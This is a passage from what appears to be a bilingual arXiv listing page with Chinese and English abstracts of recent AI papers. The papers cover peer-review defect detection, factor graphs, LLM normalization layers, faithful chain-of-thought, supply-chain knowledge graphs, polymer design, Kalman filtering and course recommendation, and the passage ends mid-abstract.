LLM-generated peer reviews are increasingly common at major venues, yet their deficiencies are hard to detect because they are uniformly fluent and well-structured. Existing work either classifies authorship without judging quality, or scores quality with features designed for human-written reviews; no prior system detects deficiencies in LLM-generated reviews at the level of individual defect types. To bridge the gap, we introduce TADDLE, a Tool-Augmented Agent for Detecting Deficient LLM-Generated Peer Reviews, together with the first expert-annotated benchmark for this task. Our benchmark comprises 1,800 reviews on 50 ICLR 2025 papers, multi-label-annotated by 18 domain experts against a taxonomy of six defect categories (plus a non-deficient label). TADDLE decomposes detection into four specialized analysis tools -- Verify, Correct, Complete, and Transform -- orchestrated by an agent; an integrator synthesizes their outputs into binary and multi-label classifications via two-stage semi-supervised learning. Extensive experiments show that TADDLE performs strongly on both binary detection and the multi-label classification task. We release the benchmark and code at https://github.com/AquariusAQ/TADDLE.

2605.26908 2026-05-27 cs.AI cs.DS cs.LG 版本更新

On the Detection of Commutative Factors in Factor Graphs: Necessary and Sufficient Conditions

关于因子图中可交换因子检测的充要条件

Malte Luttermann, Ralf Möller, Marcel Gehrke

发表机构 * Institute for Humanities-Centered Artificial Intelligence, University of Hamburg, Germany(人文导向人工智能研究所,汉堡大学,德国)

AI总结 本文重新审视了因子图中可交换因子检测的理论基础,指出现有算法依赖的定理仅为必要条件而非充分条件,并提出了修正算法以保证正确性和效率。

详情
AI中文摘要

利用概率图模型(如因子图)中对象的不可区分性是提升概率推理算法的关键,并允许对领域规模进行可处理的概率推理问题。在因子图中利用不可区分对象的核心是识别可交换因子,即其输出值在分配给其部分参数的输入值的排列下保持不变的因子。本文重新审视了检测可交换因子的最先进算法的理论基础。具体而言,我们表明,在其当前形式下,最先进算法依赖于一个中心定理,该定理被错误地视为识别可交换因子的充分条件,而实际上它仅意味着必要条件。因此,正如我们在本文中所展示的,最先进算法可能会产生错误结果。为了修复当前最先进算法中存在的缺陷,我们证明了上述定理的一个略微修改版本,该版本作为识别可交换因子的必要条件。此外,我们提出了最先进算法的修正版本,在保持其效率的同时确保正确性,并引入了一种具有更严格最坏情况边界的补充算法。

英文摘要

Exploiting the indistinguishability of objects in a probabilistic graphical model such as a factor graph is key to lifted probabilistic inference algorithms and allows for tractable probabilistic inference problems with respect to domain sizes. A central building block for the exploitation of indistinguishable objects in factor graphs is the identification of commutative factors, i.e., factors whose output values are invariant under permutations of input values assigned to a subset of their arguments. In this paper, we revisit the theoretical foundations underlying the state-of-the-art algorithm to detect commutative factors. Specifically, we show that in its current form, the state-of-the-art algorithm relies on a central theorem that is mistakenly regarded as a sufficient condition to identify commutative factors, while it actually only implies necessary condition. Consequently, the state of the art might, as we show in this paper, deliver incorrect results. To fix the flaws currently present in the state of the art, we prove a slightly modified version of the aforementioned theorem, which serves as a necessary condition to identify commutative factors. Moreover, we present a corrected version of the state-of-the-art algorithm, which keeps its efficiency while ensuring correctness and introduce a complementary algorithm with tighter worst-case bounds.

2605.26898 2026-05-27 cs.SE cs.AI 版本更新

Strategies for Guiding LLMs to Use Software Design Patterns: A Case of Singleton

引导LLM使用软件设计模式的策略:以单例模式为例

Viktor Kjellberg, Farnaz Fotrousi, Miroslaw Staron

发表机构 * University of Gothenburg and Chalmers University of Technology(哥德堡大学和查尔姆斯理工大学)

AI总结 通过实验比较四种提示策略(指令、二元自动反馈、详细自动反馈、少样本详细反馈),评估13个LLM在164个Java编码挑战中生成遵循单例模式的代码的能力,发现迭代二元反馈在保持或提升功能性的同时最佳地实现了单例模式对齐。

Comments Accepted at PROMISE 2026

详情
AI中文摘要

大型语言模型(LLM)可以从自然语言提示生成功能性源代码,但往往无法一致地遵循更高级别的架构结构或设计模式。由于LLM在软件工程中的应用日益增多,它们将既定设计原则应用于生成代码的能力对于软件产品的长期成功至关重要。因此,本文的目标是确定引导LLM将设计模式融入生成源代码的策略。我们设计了一个计算实验,评估13个LLM生成遵循单例设计模式的代码的能力,使用了四种提示策略:指令、二元自动反馈、详细自动反馈以及带少样本提示的详细反馈,在HumanEval-X的164个Java编码挑战中进行。我们的结果表明,引导LLM包含设计模式的最佳策略在很大程度上取决于模型类型。尽管如此,总体而言,迭代二元反馈在保持或改善代码功能性的同时,提供了与单例模式的最佳对齐。通过指令引导,Llama 3.3在100%的情况下生成了单例类,并改善了代码功能性,使通过的测试数量增加了34.1个百分点。通过指令和二元反馈引导,它取得了类似的结果。Qwen 3(8B)使用二元反馈将单例模式对齐度提高到99.2%,功能性提高到58.6%。我们的结果表明,即使是简单的策略也可以用于引导LLM使用设计模式。

英文摘要

Large Language Models (LLMs) can generate functional source code from natural-language prompts, but often fail to consistently follow higher-level architectural structures or design patterns. Since LLMs are increasingly used in software engineering, their ability to apply established design principles to generated code is crucial to the long-term success of software products. Therefore, the goal of this paper is to identify strategies for guiding LLMs to incorporate design patterns into the generated source code. We designed a computational experiment to evaluate the ability of 13 LLMs to generate code that follows the Singleton design pattern, using four prompting strategies: instructions, binary automated feedback, extensive automated feedback, and extensive feedback with few-shot prompts, in 164 Java coding challenges from HumanEval-X. Our results shows that the optimal strategy to guide LLMs to include design patterns depends heavily on the type of model. Still, overall, iterative binary feedback provides the best alignment with Singleton while preserving or improving the code's functionality. With guiding with instructions, Llama 3.3 generated Singleton classes in 100% of cases and improved code functionality, increasing the number of tests passed by 34.1 percentage points. It achieved a similar result with guidance through instructions and binary feedback. Qwen 3 (8B) increased the alignment with Singleton to 99.2% and the functionality to 58.6% using binary feedback. Our result suggests that even simple strategies can be used to guide LLMs to use design patterns.

2605.26895 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Negligible in Size, Significant in Effect: On Scale Vectors in Large Language Models

微不足道的大小,显著的效果:大型语言模型中的尺度向量

Mingze Wang, Shuchen Zhu, Yuxin Fang, Binghui Li, Kai Shen, Shu Zhong

发表机构 * Peking University(北京大学)

AI总结 本文系统研究了大型语言模型中的尺度向量,发现其虽参数占比极小但对预训练至关重要,通过自放大预条件效应优化优化过程,并提出了三种轻量级改进策略,在多种模型规模上一致提升性能。

Comments 36 pages

详情
AI中文摘要

现代大型语言模型(LLM)中的归一化层由确定性归一化操作和可学习的尺度向量组成。尽管归一化操作已被广泛研究,但尺度向量尽管被普遍使用,其作用仍未被充分理解。在这项工作中,我们从表达能力、优化和架构结构的角度对LLM中的尺度向量进行了系统研究。首先,我们通过实验表明,虽然尺度向量仅占模型参数的极小部分,但移除它们会显著降低LLM的预训练效果。我们的理论进一步表明,在Pre-Norm架构中,尺度向量并不增加表达能力;相反,它们通过对后续线性映射产生自放大预条件效应来改善优化。其次,我们研究了权重衰减对尺度向量的作用。通过区分Input-Norm和Output-Norm层,我们从理论上证明,由于它们在优化和表达能力中的不同作用,权重衰减对前者有益但对后者有害。第三,受此理解的启发,我们提出了三种轻量级且互补的尺度向量改进方法:分支特异性异质性、线性映射周围的改进放置以及幅度-方向重参数化。理论和实验均表明,每种改进都能带来一致的收益。最后,我们将这些改进整合为一个统一的尺度向量策略,并通过在0.12B到2B参数的密集和混合专家模型上进行大规模LLM预训练实验,使用多种优化器和学习率调度,在工业级token预算下进行评估。该统一策略始终比精心调整的基线获得更低的终端损失,并展现出更有利的扩展行为,同时增加可忽略的参数和计算开销。

英文摘要

Normalization layers in modern large language models (LLMs) consist of a deterministic normalization operation and a learnable scale vector. While the normalization operation has been extensively studied, the scale vector remains poorly understood despite its ubiquitous use. In this work, we present a systematic study of scale vectors in LLMs from the perspectives of expressivity, optimization, and architectural structure. First, we show empirically that although scale vectors constitute only a negligible fraction of model parameters, removing them substantially degrades LLM pre-training. Our theory further shows that, in Pre-Norm architectures, scale vectors do not increase expressivity; instead, they improve optimization through a self-amplifying preconditioning effect on subsequent linear mappings. Second, we investigate the role of weight decay for scale vectors. By distinguishing Input-Norm and Output-Norm layers, we theoretically show that weight decay is beneficial for the former but harmful for the latter, due to their distinct roles in optimization and expressivity. Third, motivated by this understanding, we propose three lightweight and complementary improvements to scale vectors: branch-specific heterogeneity, improved placement around linear mappings, and magnitude-direction reparameterization. Both theory and experiments show that each improvement yields consistent gains. Finally, we combine these improvements into a unified scale-vector strategy and evaluate it through extensive LLM pre-training experiments on dense and mixture-of-experts models ranging from 0.12B to 2B parameters, across multiple optimizers and learning rate schedules, under industrial-scale token budgets. The unified strategy consistently achieves lower terminal loss than well-tuned baselines and exhibits more favorable scaling behavior, while adding negligible parameter and computational overhead.

2605.26893 2026-05-27 cs.CL cs.AI 版本更新

GeoFaith: A Spatio-Temporal Dual View of Faithful Chain-of-Thought

GeoFaith: 时空双视角下的忠实思维链

Weijiang Lv, Wentong Zhao, Jiayu Wang, Yuhao Wu, Jiaheng Wei, Xiaobo Xia

发表机构 * Xidian University(西安电子科技大学) Xi’an Jiaotong University(西安交通大学) Mohamed bin Zayed University of Artificial Intelligence(穆罕默德·本·扎耶德人工智能大学) The Hong Kong University of Science and Technology (Guangzhou)(香港科学与技术大学(广州)) University of Science and Technology of China(中国科学技术大学)

AI总结 针对思维链推理中的事后合理化问题,提出基于潜在几何结构和熵动力学的时空框架GeoFaith,通过可扩展的引导流水线构建忠实性检测器并联合优化结果正确性、过程忠实性和轨迹一致性。

详情
AI中文摘要

思维链推理推动了大型语言模型的发展,但基于结果的监督导致了普遍的事后合理化,产生了看似合理但不忠实的推理链。大多数先前的忠实性评估方法要么不可扩展、昂贵,要么不可靠。我们提出GeoFaith,一个利用潜在几何结构和熵动力学来诊断和强制忠实推理的时空框架。我们开发了一个可扩展的引导流水线,将四个领域的步骤级标注从1k扩展到20k样本,训练了一个在标准基准上优于GPT-5的8B忠实性检测器,并设计了一个忠实性感知的强化学习框架,联合优化结果正确性、过程忠实性和轨迹一致性。实验表明,所提出的方法在忠实性检测和下游推理上均取得了优越性能,生成了更短、更可解释的链,且不牺牲准确性。我们的代码将公开提供。

英文摘要

Chain-of-Thought (CoT) reasoning has advanced large language models (LLMs), but outcome-based supervision leads to pervasive post-hoc rationalization, producing plausible yet unfaithful reasoning chains. Most prior faithfulness assessment methods are either unscalable, expensive, or unreliable. We propose GeoFaith, a spatio-temporal framework that leverages latent geometric structure and entropy dynamics to diagnose and enforce faithful reasoning. We develop a scalable bootstrapping pipeline expanding step-level annotations from 1k to 20k samples across four domains, train an 8B faithfulness detector outperforming GPT-5 on standard benchmarks, and design a faithfulness-aware reinforcement learning framework jointly optimizing outcome correctness, process faithfulness, and trajectory consistency. Experiments show the proposed method achieves superior performance on both faithfulness detection and downstream reasoning, producing shorter, more interpretable chains without sacrificing accuracy. Our code will be made available publicly.

2605.26878 2026-05-27 cs.AI 版本更新

Multi-Stakeholder LLM Alignment: Decomposing Estimation from Aggregation

多方利益相关者LLM对齐:从聚合中分解估计

Lulu Zheng, Wenjin Yang, Xiangwen Zhang, Rong Yin, Yulan Hu, Zheng Pan, Xin Li

发表机构 * AMAP, Alibaba Group(阿里集团AMAP) Beihang University(北京航空航天大学)

AI总结 针对多方利益相关者任务中用户偏好冲突的问题,提出DecompR方法,通过反事实校准权重固定查询结构,独立估计角色效用,消除候选依赖的权重漂移并降低估计噪声。

详情
AI中文摘要

多方利益相关者任务需要单个输出满足具有冲突偏好的用户。整体LLM评判器混淆了效用估计和效用聚合,产生不稳定的隐式权重。我们通过实验和理论证明,当利益相关者满意度分散时,这种聚合特定的\emph{权重噪声}可能导致较大的分数偏移;在我们的实验中,这些权重引起的偏移也随利益相关者数量增加而增加。我们提出 extsc{DecompR}:反事实校准的权重在候选评分前从查询结构固定,而每个角色的效用独立估计,消除了候选依赖的权重漂移并减少了估计噪声。

英文摘要

Multi-stakeholder tasks require one output to satisfy users with conflicting preferences. Holistic LLM judges conflate utility estimation and utility aggregation, yielding unstable implicit weights. We show empirically and theoretically that this aggregation-specific \emph{weighting noise} can create large score shifts when stakeholder satisfaction is dispersed; in our experiments, these weight-induced shifts also increase with stakeholder count. We propose \textsc{DecompR}: counterfactual-calibrated weights are fixed from query structure before candidate scoring, while per-role utilities are estimated independently, removing candidate-dependent weight drift and reducing estimation noise.

2605.26870 2026-05-27 cs.MA cs.AI cs.HC 版本更新

Persistent AI Agents in Academic Research: A Single-Investigator Implementation Case Study

学术研究中的持久性AI智能体:单研究者实施案例研究

Anas H. Alzahrani

发表机构 * Department of Preventive Medicine and Public Health, Faculty of Medicine, King Abdulaziz University(预防医学与公共卫生系,医学院,国王阿卜杜勒阿齐兹大学)

AI总结 通过单研究者案例研究,分析了持久性AI智能体在真实学术环境中的架构、使用、产出和治理,发现缓存主导的工作流可能将经济单位从每token成本转向每完成工件成本。

Comments 19 pages, 2 figures, 3 main tables; supplementary appendix with 6 tables, 2 figures, and a reproducibility methods section. Describes 17 configured agents in a persistent research environment and introduces the PARE-M (Persistent Agentic Research Environment Measurement) framework

详情
AI中文摘要

背景:大型语言模型通常作为模型、基准或简短对话片段进行评估。当智能体持久嵌入真实学术研究环境,具有持久记忆、本地文件、外部工具、计划例程、委派角色和明确安全协议时,会发生什么知之甚少。方法:从2026年1月31日至5月25日进行了一项结构化自我观察的实施案例研究。分析单元是持久的人-智能体环境:研究者、智能体运行时、记忆层、工具、仓库、计划任务、专门智能体角色和治理规则。结果使用PARE-M(持久智能体研究环境测量)组织,这是一个涵盖架构、利用、工件生产、资源使用、可重复性和治理的测量框架。结果:可恢复的主智能体遥测包含96个活跃日中的75,671条去重记录,其中8,059条用户角色消息和23,710条助手角色消息。工作空间包括502个记忆相关文件、17个配置的智能体目录和57个技能文件。活跃系统时间为579.7小时(30分钟上限间隙估计)。记忆衍生记录识别出482个输出代理事件和889个失败、验证、纠正或协议代理事件。一个严格的2026年5月轨迹子集捕获了627个模型完成事件和73.95百万记录token,其中82.9%为缓存读取。结论:工作流以缓存为主导,表明持久智能体环境可能将经济单位从每token成本转向每完成工件成本。未来评估应使用工件级分母、可重复解析规则、纠正分类法和治理事件的独立编码。

英文摘要

Background: Large language models are typically evaluated as models, benchmarks, or short conversational episodes. Less is known about what happens when an agent is embedded persistently in a real academic research environment with durable memory, local files, external tools, scheduled routines, delegated roles, and explicit safety protocols. Methods: A structured self-observed implementation case study was conducted from January 31 to May 25, 2026. The unit of analysis was the persistent human-agent environment: researcher, agent runtime, memory layer, tools, repositories, scheduled jobs, specialized agent roles, and governance rules. Outcomes were organized using PARE-M (Persistent Agentic Research Environment Measurement), a measurement framework covering architecture, utilization, artifact production, resource use, reproducibility, and governance. Results: Recoverable main-agent telemetry contained 75,671 de-duplicated records across 96 active days, with 8,059 user-role and 23,710 assistant-role messages. The workspace included 502 memory-related files, 17 configured agent directories, and 57 skill files. Active system time was 579.7 hours (30-minute capped-gap estimate). Memory-derived records identified 482 output-proxy events and 889 failure, verification, correction, or protocol-proxy events. A strict May 2026 trajectory subset captured 627 model-completed events and 73.95 million recorded tokens, of which 82.9% were cache reads. Conclusions: The workflow was cache-dominant, suggesting that persistent agentic environments may shift the economic unit from cost per token to cost per completed artifact. Future evaluations should use artifact-level denominators, reproducible parsing rules, correction taxonomies, and independent coding of governance events.

2605.26856 2026-05-27 q-bio.NC cs.AI cs.RO 版本更新

The Sensation Modulating Network:Haltability as the architectural ground for object-directed phenomenology

感觉调节网络:可停性作为对象导向现象学的架构基础

G. Nagarjuna, Durgaprasad Karnam

发表机构 * Indian Institute of Science Education and Research (IISER) Pune(印度科学教育与研究学院(IISER)浦那) Centre for Educational Technology (CET), Indian Institute of Technology Bombay(教育技术中心(CET),印度理工学院孟买)

AI总结 本文提出感觉调节网络(SMN)作为具身认知的架构,通过对手动力学和可停性机制,将对象导向现象学(胡塞尔意义)的意向性建立在身体组织的结构特征上,从而调和认知主义与4E认知的争论。

Comments 64 pages, main body 38 pages + References 6, Appendices 20 pages, Tables 3, and Figures 21

详情
AI中文摘要

认知科学仍然分裂为认知主义——它解释了递归和语言,但无法将形式符号扎根于意义——和4E方法——它将认知扎根于身体,但很少详细说明身体的架构以支持生成性。我们认为这一僵局源于对具身代理架构的不完整描述,并提出一个架构:感觉调节网络(SMN),即认知代理被构想为整个身体,在每个解剖尺度上由对手动力学组织,由感觉调节器构建,这些调节器通过一个基底感知和行动,配对成协调动作区,由全身广播网络路由。三个承诺赋予了SMN其效力。可停性——将对抗性可供性招募到共激活平衡中——提供了对象导向现象学(在胡塞尔意义上)所需的架构位置:对手性使得共激活成为可能,共激活使得停止成为可能,停止使得注意成为可能,注意使得意向指向成为可能,而无需在顶层添加任何模块。可自我调节动作模式(SMAP)的双信号特性使得自我/世界区分成为布线的结构特征,而非代理应用的范畴。四级动作模式层级——基础、可停、可协商、交易——提供了从自主规律性到公共惯例化的单一轨迹,将基于语法的生成性条件定位为架构转变。SMN调和了认知主义与4E的争论:递归存在于可协商动作模式的可修改动力学中,具身性存在于支持它们的对手基底中。附录中给出了一个初步的形式化方法和八个预测寄存器(七个可测试,一个假设性),以及参考模拟。

英文摘要

Cognitive science remains split between cognitivism - which accounts for recursion and language but cannot ground formal symbols in meaning - and 4E approaches - which ground cognition in the body but rarely specify the body's architecture in enough detail to support generativity. We argue the impasse stems from an incomplete account of the embodied agent's architecture, and propose one: the Sensation Modulating Network (SMN), the cognitive agent conceived as the whole body, organized at every anatomical scale by opponent dynamics, built from Sensation Modulators that sense and act through one substrate, paired into Coordinated Action Zones routed by a body-wide broadcast network. Three commitments give the SMN its purchase. Haltability - the recruitment of antagonistic affordance into co-activated equilibrium - provides the architectural locus that object-directed phenomenology, in Husserl's sense, requires: opponency enables co-activation, co-activation enables halt, halt enables attention, attention enables intentional directedness, with no module added on top. The dual-signal property of self-modulatable action patterns (SMAPs) makes the self/world distinction a structural feature of the wiring rather than a category the agent applies. And a four-level action-pattern hierarchy - Basal, Haltable, Negotiable, Transactional - gives a single trajectory from autonomic regularity to public conventionalization, locating the conditions for grammar-grounded generativity as architectural transitions. The SMN reconciles the cognitivism-4E debate: recursion lives in the modifiable dynamics of Negotiable Action Patterns, embodiment in the opponent substrate that supports them. A tentative formalism and eight predicted registers (seven testable, one hypothetical), with reference simulations, are given in an appendix.

2605.26835 2026-05-27 cs.AI 版本更新

Helicase: Uncertainty-Guided Supply Chain Knowledge Graph Construction with Autonomous Multi-Agent LLMs

Helicase: 不确定性引导的供应链知识图谱构建与自主多智能体大语言模型

Yunbo Long, Haolang Zhao, Ge Zheng, Alexandra Brintrup

发表机构 * Department of Engineering, University of Cambridge(剑桥大学工程系) The Alan Turing Institute(艾伦·图灵研究所)

AI总结 提出Helicase,一种基于多智能体大语言模型的自主系统,通过不确定性引导的迭代验证和知识图谱构建,解决供应链中需要多跳推理的结构化推断问题,并引入SCQA基准评估。

详情
AI中文摘要

基于大语言模型的多智能体系统已被广泛用于知识检索和报告生成,通过网页搜索和文本推理综合已知信息。然而,供应链中的许多关键信息任务并非简单的一次性查询:它们是结构化推断问题,需要在复杂、碎片化的网络资源中进行多跳推理。诸如“特斯拉哪些组件使用了来自澳大利亚矿山的锂?”之类的问题在任何单一文档中都没有答案;答案必须通过自主构建和分析从碎片化、异构来源中组装起来的动态知识图谱,以计算方式合成。此外,这种发现过程必须具有不确定性意识:决策不仅依赖于答案,还依赖于对其可靠性的校准置信度,该置信度可追溯到来源质量和推理一致性。为了解决这一能力差距,我们提出了Helicase,一种用于不确定性引导的供应链知识图谱构建的自主多智能体大语言模型系统。Helicase将高层供应链查询分解为可执行的调查计划,通过迭代验证循环协调专门的网页搜索、推理和编码智能体,并逐步构建带有每个事实不确定性注释的查询特定供应链知识图谱。其三层不确定性框架在行动、轨迹和记忆层跟踪不确定性,从而实现结构化推断和校准置信度评估。为了评估整个复杂性谱系中的自主推理,我们引入了SCQA(供应链查询评估),这是一个包含80个供应链查询的基准,这些查询组织成四个象限,涵盖单跳到多跳推理,在高低数据可见性下进行。

英文摘要

LLM-based multi-agent systems have been widely adopted for knowledge retrieval and report generation, synthesizing known information through web search and textual reasoning. However, many critical information tasks in supply chains are not simple one-shot queries: they are structural inference problems requiring multi-hop reasoning across complex, fragmented web resources. Questions such as \textit{``Which Tesla components use lithium from Australian mines?''} have no answer in any single document; answers must be computationally synthesized through the autonomous construction and analysis of dynamic knowledge graphs assembled from fragmented, heterogeneous sources. Moreover, such discovery processes must be uncertainty-aware: decisions depend not only on answers but on calibrated confidence in their reliability, traceable to source quality and reasoning consistency. To address this capability gap, we propose \textit{Helicase}, an autonomous multi-agent LLM system for uncertainty-guided supply chain knowledge graph construction. \textit{Helicase} decomposes high-level supply-chain queries into executable investigation plans, coordinates specialized web-search, reasoning, and coding agents through iterative verification loops, and incrementally constructs query-specific supply chain knowledge graphs with per-fact uncertainty annotations. Its three-layer uncertainty framework tracks uncertainty at the action, trajectory, and memory layers, enabling both structural inference and calibrated confidence assessment. To evaluate autonomous reasoning across the full complexity spectrum, we introduce SCQA (Supply Chain Query Assessment), a benchmark of 80 supply chain queries organized into four quadrants spanning single-hop to multi-hop inference under both high and low data visibility.

2605.26833 2026-05-27 cs.LG cs.AI 版本更新

Periodic Topological Deep Learning for Polymer Design and Discovery

周期性拓扑深度学习用于聚合物设计与发现

Yasharth Yadav, Tze Kwang Gerald Er, Atsushi Goto, Kelin Xia

发表机构 * School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore 637371(新加坡南洋理工大学物理与数学科学学院) School of Chemistry, Chemical Engineering and Biotechnology (CCEB), Nanyang Technological University, Singapore 637371(新加坡南洋理工大学化学、化工与生物技术学院)

AI总结 提出基于周期性Vietoris-Rips复形和层次单纯形消息传递的深度学习框架Periodic-TDL,通过捕捉多体相互作用和长程信息,在聚合物性质预测任务上超越现有模型,并验证了酯到酰胺取代和α-甲基化对热稳定性的提升。

Comments 19 pages, 3 figures, 3 tables

详情
AI中文摘要

聚合物支撑着能源、医疗和材料科学领域的应用,但其广阔的化学空间使得系统性发现充满挑战。大多数机器学习方法将聚合物表示为单个重复单元的分子图,从而忽略了聚合物链的周期性和超越成对键的多体相互作用。我们提出了Periodic-TDL,一个基于周期性Vietoris-Rips复形的深度学习框架,该复形捕捉跨多个空间尺度的多体相互作用,随后通过层次单纯形消息传递(HSMP)编码器将信息从长程相互作用传播到共价键,产生由高阶拓扑特征增强的表征。Periodic-TDL在涵盖电子、光学、物理和热学目标的聚合物性质预测任务中优于所有最先进的模型。此外,我们定量验证了酯到酰胺取代和α-甲基化如何增强热稳定性。使用通过系统取代丙烯酸酯和丙烯酰胺聚合物生成的计算合成数据集(48,208个结构),我们观察到在匹配的聚合物对中,酯到酰胺取代的平均$T_g$增加约$55^\circ$C,主链α-甲基化的平均$T_g$增加约$14^\circ$C。为了验证这些预测趋势,我们使用Periodic-TDL模型分析了来自独立实验测量的六对新型聚合物,包括三篇文献中未报道的新合成聚合物。实验数据成功证实了模型的预测。最终,这些发现表明Periodic-TDL捕捉了特定官能团修饰的潜在物理效应,而不仅仅是优化基准数据集上的预测性能。

英文摘要

Polymers underpin applications across energy, healthcare, and materials science, yet their vast chemical space makes systematic discovery challenging. Most machine learning approaches represent polymers as molecular graphs of a single repeating unit, thereby missing both the periodicity of polymer chains and many-body interactions beyond pairwise bonds. We introduce Periodic-TDL, a deep learning framework built on periodic Vietoris-Rips complexes that capture many-body interactions across multiple spatial scales, followed by a hierarchical simplicial message-passing (HSMP) encoder that propagates information from long-range interactions to covalent bonds, yielding representations enriched by higher-order topological features. Periodic-TDL outperforms all state-of-the-art models across polymer property prediction tasks spanning electronic, optical, physical, and thermal targets. Furthermore, we quantitatively validate how ester-to-amide substitution and $α$-methylation enhance thermal stability. Using a computationally synthesized dataset of 48,208 structures-generated via systematic substitution of acrylate and acrylamide polymers-we observed a mean $T_g$ increase of $\sim 55^\circ$C for ester-to-amide substitutions and $\sim 14^\circ$C for backbone $α$-methylation across matched polymer pairs. To verify these predicted trends, we use our Periodic-TDL model to analyze six novel polymer pairs from independent experimental measurements, including three newly synthesized polymers previously unreported in the literature. The experimental data successfully confirmed the model's predictions. Ultimately, these findings demonstrate that Periodic-TDL captures the underlying physical effects of specific functional group modifications, rather than merely optimizing predictive performance on benchmark datasets.

2605.26830 2026-05-27 cs.LG cs.AI cs.CV 版本更新

The Kalman Evolve: Closing the Gap in Kalman Filtering via Interpretable Algorithm Discovery

卡尔曼演化:通过可解释算法发现缩小卡尔曼滤波的差距

Vasileios Saketos, Ming Xiao

发表机构 * KTH Royal Institute of Technology(皇家理工学院)

AI总结 针对非线性传感场景下卡尔曼滤波性能下降的问题,提出Kalman Evolve框架,联合优化噪声参数与更新结构,利用大语言模型生成可解释的非仿射修改,在多个基准上实现高达12%的RMSE降低。

详情
AI中文摘要

状态估计是控制和信号处理中的一个基本问题,卡尔曼滤波器在线性动力学、高斯噪声和已知噪声协方差下提供最优解。然而,这些假设在多普勒雷达和LiDAR等实际传感场景中常常不成立。在这些情况下,最优估计器本质上是非线性的,导致系统性能下降。这产生了一个仅通过调整噪声协方差参数(即卡尔曼滤波器中的过程噪声和测量噪声)无法消除的性能差距。为了解决这一限制,我们提出了Kalman Evolve,一个通过联合优化噪声参数和更新结构来发现改进滤波算法的框架。我们的方法利用大语言模型作为程序空间上的结构化先验,能够生成对经典卡尔曼滤波器的可解释、非仿射修改,同时保留其递归形式。我们提供了分析结果,证明了在常见非线性传感模型下仿射估计器的次优性,从而激发了结构感知更新的必要性。在一系列合成和真实跟踪基准测试中,包括多普勒雷达、基于LiDAR的定位和行人跟踪,所发现的算法始终优于强基线(如优化卡尔曼滤波器),实现了高达12%的RMSE降低。这些结果表明,优化卡尔曼滤波器的结构而不仅仅是其参数,提供了一种实用且可解释的方式来改进状态估计。

英文摘要

State estimation is a fundamental problem in control and signal processing, for which the Kalman Filter provides an optimal solution under linear dynamics, Gaussian noise, and known noise covariances. However, these assumptions often fail in realistic sensing settings such as Doppler radar and LiDAR. In these cases, the optimal estimator is inherently nonlinear, which leads to systematic performance degradation. This creates a performance gap that cannot be eliminated by tuning the noise covariance parameters (i.e., the process and measurement noise in the Kalman Filter) alone. To address this limitation, we propose Kalman Evolve, a framework for discovering improved filtering algorithms by jointly optimizing both noise parameters and the update structure. Our approach leverages large language models (LLMs) as a structured prior over program space, enabling the generation of interpretable, non-affine modifications to the classical Kalman filter while preserving its recursive form. We provide analytical results establishing the suboptimality of affine estimators under common nonlinear sensing models, motivating the need for structure-aware updates. Across a range of synthetic and real-world tracking benchmarks, including Doppler radar, LiDAR-based localization, and pedestrian tracking, the discovered algorithms consistently improve over strong baselines such as the Optimized Kalman Filter, achieving up to 12\% reduction in RMSE. These results suggest that optimizing the structure of the Kalman filter, rather than only its parameters, provides a practical and interpretable way to improve state estimation.

2605.26827 2026-05-27 cs.CL cs.AI 版本更新

ContextGuard: Structured Self-Auditing for Context Learning in Language Models

ContextGuard: 语言模型中上下文学习的结构化自我审计

Hongbo Jin, Chi Wang, Haoran Tang, Zhongjing Du, Xu Jiang, Jingqi Tian, Qiaoman Zhang, Jiayu Ding

发表机构 * Peking University(北京大学) SCUT(上海交通大学) Tsinghua University(清华大学)

AI总结 提出ContextGuard框架,通过结构化自我审计机制使大语言模型在复杂上下文任务中忠实遵循所有上下文约束,包括外围、持久和格式敏感要求。

详情
AI中文摘要

最近的基准测试揭示,尽管大语言模型(LLMs)具有强大的推理能力,但在忠实应用复杂上下文知识方面仍存在困难。这些失败通常不是整体推理崩溃:在上下文丰富的任务中,模型可能遵循中心推理路径,同时遗漏外围、持久或格式敏感的要求。

英文摘要

Recent benchmarks reveal that despite strong reasoning capabilities, large language models (LLMs) still struggle to faithfully apply complex contextual knowledge. These failures are often not wholesale reasoning collapses: in context-rich tasks, models may follow the central reasoning path while missing peripheral, persistent, or format-sensitive requirements.

2605.26819 2026-05-27 cs.IR cs.AI 版本更新

RAGEAR: Retrieval-Augmented Graph-Enhanced Academic Recommender

RAGEAR: 检索增强的图增强学术推荐器

Francesco Granata, Lorenzo Lamazzi, Misael Mongiovì, Francesco Poggi, Valeria Secchini

发表机构 * Department of Mathematics and Computer Science, University of Catania, Italy(卡塔尼亚大学数学与计算机科学系,意大利) Institute for Cognitive Science and Technology, National Research Council, Italy(意大利国家研究委员会认知科学与技术研究所)

AI总结 提出RAGEAR,一种神经符号推荐系统,结合密集检索和知识图谱,通过图感知聚合函数将片段级证据传播到课程级推荐,在学术课程推荐中优于元数据基线。

详情
AI中文摘要

我们提出了RAGEAR(检索增强的图增强学术推荐器),一种用于学术课程推荐的神经符号推荐系统。RAGEAR将完整讲座转录本的密集检索与符号知识图谱相结合,该图谱建模课程、课程、转录本片段、学分、学习计划和课程信息。知识图谱支持基于结构化约束(如学分、学科、学习计划和先修课程)的符号过滤和情境化。与基于元数据的方法不同,它通过检索与学生查询语义对齐的转录本片段来利用细粒度的教学内容。主要贡献是一种图感知聚合函数,它将片段级证据传播到课程级推荐。得分结合了三个因素:与课程相关的检索相似性份额、其相关片段的基于排名的强度以及证据在课程间的分布。我们通过人工评估样本和大规模基于LLM的相关性评估,在152个学生类查询上评估了RAGEAR。结果表明,讲座转录本优于仅元数据检索,并且RAGEAR进一步提高了基于转录本的归一化SumP基线的排名质量,尤其是在排名靠前的推荐中。

英文摘要

We present RAGEAR (Retrieval-Augmented Graph-Enhanced Academic Recommender), a neurosymbolic recommender system for academic course recommendation. RAGEAR combines dense retrieval over full lecture transcripts with a symbolic Knowledge Graph modelling courses, lessons, transcript chunks, credits, study plans, and curricular information. The Knowledge Graph supports symbolic filtering and contextualisation based on structured constraints, such as credits, academic disciplines, study plans, and prerequisites. Unlike metadata-based approaches, it exploits fine-grained instructional content by retrieving transcript chunks semantically aligned with a student's query. The main contribution is a graph-aware aggregation function that propagates chunk-level evidence to course-level recommendations. The score combines three factors: the share of retrieved similarity associated with a course, the rank-based strength of its relevant chunks, and the distribution of evidence across lessons. We evaluate RAGEAR on 152 student-like queries through a human evaluation sample and a large-scale LLM-based relevance assessment. Results show that lecture transcripts improve over metadata-only retrieval, and that 